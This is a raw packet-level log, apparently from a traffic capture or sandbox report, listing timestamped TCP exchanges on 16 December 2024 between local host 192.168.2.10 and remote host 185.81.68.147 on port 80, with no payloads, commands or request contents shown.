                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.591160059 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.591171980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.591942072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.592016935 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.592046976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.592896938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.592935085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.593015909 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.593808889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.593919992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.593997955 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.594629049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.594733000 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.594806910 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.595453978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.595499039 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.595566034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.596337080 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.596436024 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.596507072 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.597196102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.597291946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.597364902 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.598098040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.598226070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.598295927 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.598999977 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.599040985 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.599144936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.599839926 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.599903107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.599909067 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.600713968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.600758076 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.600841999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.601603031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.601671934 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.601686001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.602464914 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.602538109 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.602556944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.603349924 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.603423119 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.603424072 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.604226112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.604243994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.604314089 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.753861904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.753932953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.754122019 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.754211903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.754357100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.754439116 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.755115986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.755224943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.756023884 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.756098032 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.756226063 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.756845951 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.756879091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.756969929 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.757077932 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.757858992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.757987976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.758074999 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.758651972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.758732080 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.759505987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.759582043 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.759656906 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.760521889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.760603905 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.760621071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.760854959 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.761240005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.761369944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.761445045 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.762197971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.762260914 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.762341976 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.762993097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.763094902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.763617992 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.763887882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.763999939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.764811039 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.764909983 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.764929056 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.765023947 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.765625000 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.765742064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.765841961 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.766520023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.766607046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.766705036 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.767384052 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.767524958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.767625093 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.768294096 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.768466949 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.768852949 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.769186020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.769273043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.770011902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.770090103 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.770149946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.770895958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.770986080 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.771013021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.771737099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.771831036 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.771924019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.772011995 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.772648096 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.772744894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.772849083 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.773493052 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.773621082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.773711920 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.774451017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.774583101 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.775300026 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.775382042 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.775398016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.775650978 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.776175976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.776253939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.776348114 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.777039051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.777110100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.777204990 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.777909994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.778029919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.778862953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.778928995 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.778953075 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.778973103 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.779720068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.779933929 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.780605078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.780677080 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.780683041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.780848980 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.781547070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.781644106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.781781912 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.782361031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.782494068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.782563925 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.783325911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.783422947 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.783498049 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.784070969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.784169912 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.784842014 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.784935951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.785027027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.785911083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.785979986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.785984039 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.786005020 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.786854982 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.786907911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.786982059 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.787571907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.787858009 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.788609028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.788680077 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.788861990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.789566040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.789604902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.789643049 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.789654970 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.790220976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.790297985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.791050911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.791119099 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.791169882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.791944981 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.792011023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.792017937 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.792040110 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.792799950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.792928934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.793000937 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.793708086 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.793931007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.794596910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.794687986 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.794724941 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.795494080 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.795578003 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.795605898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.795685053 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.796330929 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.796565056 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.796648979 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.797209024 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.797317982 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.797401905 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.798099041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.798217058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.798975945 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.798995018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.799057961 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.799076080 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.799798012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.855900049 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224693060 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224709988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224720955 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224728107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224737883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224749088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224759102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224776030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224786997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224800110 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224864960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224875927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224885941 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224895954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224906921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224916935 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224927902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224937916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224940062 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224963903 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224967957 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224971056 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224980116 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224989891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.224999905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225011110 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225016117 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225020885 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225032091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225104094 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225135088 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225749969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225770950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225781918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225792885 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225802898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225814104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225833893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225835085 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225845098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225855112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225864887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225872040 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225876093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225887060 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225897074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225903034 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225915909 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.225936890 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226608992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226629019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226640940 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226651907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226661921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226672888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226684093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226695061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226706028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226708889 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226716042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226727009 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226737022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226743937 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226747990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226758957 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226764917 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226772070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226783991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226800919 CET4972380192.168.2.10185.81.68.147
